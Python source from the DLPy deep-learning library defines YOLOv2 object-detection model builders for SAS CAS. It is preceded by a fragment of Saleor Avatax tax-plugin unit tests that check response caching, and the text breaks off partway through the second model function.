    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First shipping-price call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # when
    result = manager.calculate_checkout_shipping(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # Second Avatax call to make sure that we use cached response
    manager.calculate_checkout_shipping(
        checkout_info, lines, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("8.13", "USD"), gross=Money("10", "USD"))
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_line_total_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Line total is computed from the cached Avatax response; the cache
    is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # when
    result = manager.calculate_checkout_line_total(
        checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_line_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First line-total call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # when
    result = manager.calculate_checkout_line_total(
        checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
    )
    # Second Avatax call to make sure that we use cached response
    manager.calculate_checkout_line_total(
        checkout_info, lines, checkout_line_info, checkout_info.shipping_address, []
    )
    # then
    assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_calculate_checkout_line_unit_price_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Line unit price is computed from the cached Avatax response; the
    cache is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # Undiscounted line total passed in for the unit-price derivation.
    quantity = checkout_line_info.line.quantity
    total_line_price = checkout_line_info.channel_listing.price * quantity
    # when
    result = manager.calculate_checkout_line_unit_price(
        total_line_price,
        quantity,
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
    )
    # then
    assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_calculate_checkout_line_unit_price_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First unit-price call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # Undiscounted line total passed in for the unit-price derivation.
    quantity = checkout_line_info.line.quantity
    total_line_price = checkout_line_info.channel_listing.price * quantity
    # when
    result = manager.calculate_checkout_line_unit_price(
        total_line_price,
        quantity,
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
    )
    # Second Avatax call to make sure that we use cached response
    manager.calculate_checkout_line_unit_price(
        total_line_price,
        quantity,
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
    )
    # then
    assert result == TaxedMoney(net=Money("4.07", "USD"), gross=Money("5", "USD"))
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_get_checkout_line_tax_rate_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Line tax rate is derived from the cached Avatax response; the cache
    is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # Fallback price; the rate should come from the cached response instead.
    fake_unit_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
    # when
    result = manager.get_checkout_line_tax_rate(
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
        fake_unit_price,
    )
    # then
    assert result == Decimal("0.23")
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_get_checkout_line_tax_rate_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First line-tax-rate call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Exercise the calculation for the first checkout line only.
    checkout_line_info = lines[0]
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # Fallback price; the rate should come from the Avatax response instead.
    fake_unit_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
    # when
    result = manager.get_checkout_line_tax_rate(
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
        fake_unit_price,
    )
    # Second Avatax call to make sure that we use cached response
    manager.get_checkout_line_tax_rate(
        checkout_info,
        lines,
        checkout_line_info,
        checkout_info.shipping_address,
        [],
        fake_unit_price,
    )
    # then
    assert result == Decimal("0.23")
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
@patch("saleor.plugins.avatax.cache.set")
def test_get_checkout_shipping_tax_rate_use_cache(
    mock_cache_set,
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """Shipping tax rate is derived from the cached Avatax response; the
    cache is read with the checkout's key and never written again."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    # Seed the cache with a matching (request_data, response) pair.
    mocked_cache = Mock(
        return_value=(
            avalara_request_data,
            avalara_response_for_checkout_with_items_and_shipping,
        )
    )
    monkeypatch.setattr("saleor.plugins.avatax.cache.get", mocked_cache)
    # Fallback price; the rate should come from the cached response instead.
    fake_shipping_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
    # when
    result = manager.get_checkout_shipping_tax_rate(
        checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
    )
    # then
    assert result == Decimal("0.23")
    avalara_cache_key = CACHE_KEY + str(checkout.token)
    mocked_cache.assert_called_with(avalara_cache_key)
    mock_cache_set.assert_not_called()
@override_settings(PLUGINS=["saleor.plugins.avatax.plugin.AvataxPlugin"])
def test_get_checkout_shipping_tax_rate_save_avatax_response_in_cache(
    checkout_with_items_and_shipping,
    checkout_with_items_and_shipping_info,
    address,
    site_settings,
    plugin_configuration,
    avalara_response_for_checkout_with_items_and_shipping,
    monkeypatch,
    channel_USD,
):
    """First shipping-tax-rate call hits the Avatax API once and caches the
    response; a repeated call reuses the cache (API not called again)."""
    # given
    checkout = checkout_with_items_and_shipping
    checkout_info = checkout_with_items_and_shipping_info
    plugin_configuration()
    manager = get_plugins_manager()
    plugin = manager.get_plugin(AvataxPlugin.PLUGIN_ID, channel_USD.slug)
    site_settings.company_address = address
    site_settings.save()
    lines = fetch_checkout_lines(checkout)
    # Mock the Avatax HTTP call so we can count how often it is made.
    mocked_avalara = Mock(
        return_value=avalara_response_for_checkout_with_items_and_shipping
    )
    monkeypatch.setattr("saleor.plugins.avatax.api_post_request", mocked_avalara)
    # Fallback price; the rate should come from the Avatax response instead.
    fake_shipping_price = TaxedMoney(net=Money("2", "USD"), gross=Money("10", "USD"))
    # when
    result = manager.get_checkout_shipping_tax_rate(
        checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
    )
    # Second Avatax call to make sure that we use cached response
    manager.get_checkout_shipping_tax_rate(
        checkout_info, lines, checkout_info.shipping_address, [], fake_shipping_price
    )
    # then
    assert result == Decimal("0.23")
    avalara_request_data = generate_request_data_from_checkout(
        checkout_info, lines, plugin.config, []
    )
    mocked_avalara.assert_called_once_with(ANY, avalara_request_data, plugin.config)
| 33.947137
| 85
| 0.746388
| 2,783
| 23,118
| 5.736615
| 0.036651
| 0.063138
| 0.089446
| 0.10523
| 0.984591
| 0.980332
| 0.980332
| 0.977701
| 0.977701
| 0.977701
| 0
| 0.004089
| 0.174929
| 23,118
| 680
| 86
| 33.997059
| 0.832914
| 0.027814
| 0
| 0.847943
| 0
| 0
| 0.064392
| 0.056812
| 0
| 0
| 0
| 0
| 0.062612
| 1
| 0.025045
| false
| 0
| 0.014311
| 0
| 0.039356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b1543ce872aecc0a1adc7bd996f5f87e6352f8dd
| 46,874
|
py
|
Python
|
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2018-08-27T15:10:11.000Z
|
2018-08-27T15:10:11.000Z
|
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | null | null | null |
dlpy/applications/yolo.py
|
arharvey918/python-dlpy
|
423985ebe65acbcbe9a7996bb26aee5e66eddc49
|
[
"Apache-2.0"
] | 1
|
2019-09-19T15:59:26.000Z
|
2019-09-19T15:59:26.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from dlpy.sequential import Sequential
from dlpy.layers import InputLayer, Conv2d, BN, Pooling, Detection, Dense, Reshape, Concat
from dlpy.utils import DLPyError
from .application_utils import get_layer_options, input_layer_options, not_supported_feature
def YoloV2(conn, anchors, model_table='YoloV2', n_channels=3, width=416, height=416, scale=1.0 / 255,
random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
num_to_force_coord=None, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Yolov2 architecture.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
anchors : list
Specifies the anchor box values.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 416
height : int, optional
Specifies the height of the input layer.
Default: 416
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the input layer.
Valid Values: 'none', 'random'
act : string, optional
Specifies the activation function for the batch normalization layers.
Default: 'leaky'
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 5
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 13
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
match_anchor_size : bool, optional
Whether to force the predicted box match the anchor boxes in sizes for all predictions
num_to_force_coord : int, optional
The number of leading chunk of images in training when the algorithm forces predicted objects
in each grid to be equal to the anchor box sizes, and located at the grid center
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1612.08242.pdf
'''
if len(anchors) != 2 * predictions_per_grid:
raise DLPyError('The size of the anchor list in the detection layer for YOLOv2 should be equal to '
'twice the number of predictions_per_grid.')
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
# conv1 224 416
model.add(Conv2d(32, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv2 112 208
model.add(Conv2d(64, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv3 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv4 56 104
model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv5 56 104
model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv6 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv7 28 52
model.add(Conv2d(128, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv8 28 52
model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv9 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv10 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv11 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv12 14 26
model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv13 14 26
model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv14 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv15 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv16 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv17 7 13
model.add(Conv2d(512, width=1, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv18 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(
Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes,
match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))
return model
def YoloV2_MultiSize(conn, anchors, model_table='YoloV2-MultiSize', n_channels=3, width=416, height=416, scale=1.0 / 255,
                     random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
                     coord_type='YOLO', max_label_per_image=30, max_boxes=30,
                     n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
                     coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
                     detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
                     num_to_force_coord=None, random_flip=None, random_crop=None):
    '''
    Generates a deep learning model with the Yolov2 architecture.

    The model is same as Yolov2 proposed in original paper. In addition to
    Yolov2, the model adds a passthrough layer that brings feature from an
    earlier layer to lower resolution layer.

    Parameters
    ----------
    conn : CAS
        Specifies the connection of the CAS connection.
    anchors : list
        Specifies the anchor box values.
    model_table : string, optional
        Specifies the name of CAS table to store the model.
    n_channels : int, optional
        Specifies the number of the channels (i.e., depth) of the input layer.
        Default: 3
    width : int, optional
        Specifies the width of the input layer.
        Default: 416
    height : int, optional
        Specifies the height of the input layer.
        Default: 416
    scale : double, optional
        Specifies a scaling factor to be applied to each pixel intensity values.
        Default: 1.0 / 255
    random_mutation : string, optional
        Specifies how to apply data augmentations/mutations to the data in the
        input layer.
        Valid Values: 'none', 'random'
    act : string, optional
        Specifies the activation function for the batch normalization layers.
        Default: 'leaky'
    act_detection : string, optional
        Specifies the activation function for the detection layer.
        Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFTPLUS, ELU, LEAKY, FCMP
        Default: AUTO
    softmax_for_class_prob : bool, optional
        Specifies whether to perform Softmax on class probability per
        predicted object.
        Default: True
    coord_type : string, optional
        Specifies the format of how to represent bounding boxes. For example,
        a bounding box can be represented with the x and y locations of the
        top-left point as well as width and height of the rectangle.
        This format is the 'rect' format. We also support coco and yolo formats.
        Valid Values: 'rect', 'yolo', 'coco'
        Default: 'yolo'
    max_label_per_image : int, optional
        Specifies the maximum number of labels per image in the training.
        Default: 30
    max_boxes : int, optional
        Specifies the maximum number of overall predictions allowed in the
        detection layer.
        Default: 30
    n_classes : int, optional
        Specifies the number of classes. If None is assigned, the model will
        automatically detect the number of classes based on the training set.
        Default: 20
    predictions_per_grid : int, optional
        Specifies the number of predictions to be made per grid cell.
        Default: 5
    do_sqrt : bool, optional
        Specifies whether to apply the SQRT function to width and height of
        the object for the cost function.
        Default: True
    grid_number : int, optional
        Specifies the amount of cells to be analyzed for an image. For example,
        if the value is 5, then the image will be divided into a 5 x 5 grid.
        Default: 13
    coord_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects exist in the grid.
    object_scale : float, optional
        Specifies the weight for object detected for the cost function in
        the detection layer.
    prediction_not_a_object_scale : float, optional
        Specifies the weight for the cost function in the detection layer,
        when objects do not exist in the grid.
    class_scale : float, optional
        Specifies the weight for the class of object detected for the cost
        function in the detection layer.
    detection_threshold : float, optional
        Specifies the threshold for object detection.
    iou_threshold : float, optional
        Specifies the IOU Threshold of maximum suppression in object detection.
    random_boxes : bool, optional
        Randomizing boxes when loading the bounding box information.
        Default: False
    match_anchor_size : bool, optional
        Whether to force the predicted box match the anchor boxes in sizes for all predictions
    num_to_force_coord : int, optional
        The number of leading chunk of images in training when the algorithm forces predicted objects
        in each grid to be equal to the anchor box sizes, and located at the grid center
    random_flip : string, optional
        Specifies how to flip the data in the input layer when image data is
        used. Approximately half of the input data is subject to flipping.
        Valid Values: 'h', 'hv', 'v', 'none'
    random_crop : string, optional
        Specifies how to crop the data in the input layer when image data is
        used. Images are cropped to the values that are specified in the width
        and height parameters. Only the images with one or both dimensions
        that are larger than those sizes are cropped.
        Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'

    Returns
    -------
    :class:`Sequential`

    References
    ----------
    https://arxiv.org/pdf/1612.08242.pdf

    '''
    # Each predicted box needs an (width, height) anchor pair; validate up front
    # for a clear error (same check as YoloV2) instead of a backend failure.
    if len(anchors) != 2 * predictions_per_grid:
        raise DLPyError('The size of the anchor list in the detection layer for YOLOv2 should be equal to '
                        'twice the number of predictions_per_grid.')

    model = Sequential(conn=conn, model_table=model_table)

    # NOTE: locals() is captured here so get_layer_options can pick out the
    # input-layer keyword arguments; do not define helper variables above this line.
    parameters = locals()
    input_parameters = get_layer_options(input_layer_options, parameters)
    # Only square inputs are supported; fall back to width x width when they differ.
    if input_parameters['width'] != input_parameters['height']:
        print(not_supported_feature('Non-square yolo model training', 'height=width'))
        input_parameters['height'] = input_parameters['width']
    model.add(InputLayer(**input_parameters))

    # Darknet-19 style backbone: Conv (no bias) + BN(act) pairs with max pooling.
    # conv1 224 416
    model.add(Conv2d(32, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv2 112 208
    model.add(Conv2d(64, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv3 56 104
    model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv4 56 104
    model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv5 56 104
    model.add(Conv2d(128, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv6 28 52
    model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv7 28 52
    model.add(Conv2d(128, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv8 28 52
    model.add(Conv2d(256, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    model.add(Pooling(width=2, height=2, stride=2, pool='max'))
    # conv9 14 26
    model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv10 14 26
    model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv11 14 26
    model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv12 14 26
    model.add(Conv2d(256, width=1, act='identity', include_bias=False, stride=1))
    model.add(BN(act=act))
    # conv13 14 26
    model.add(Conv2d(512, width=3, act='identity', include_bias=False, stride=1))
    # pointLayer1 is kept as the source of the passthrough connection (conv21).
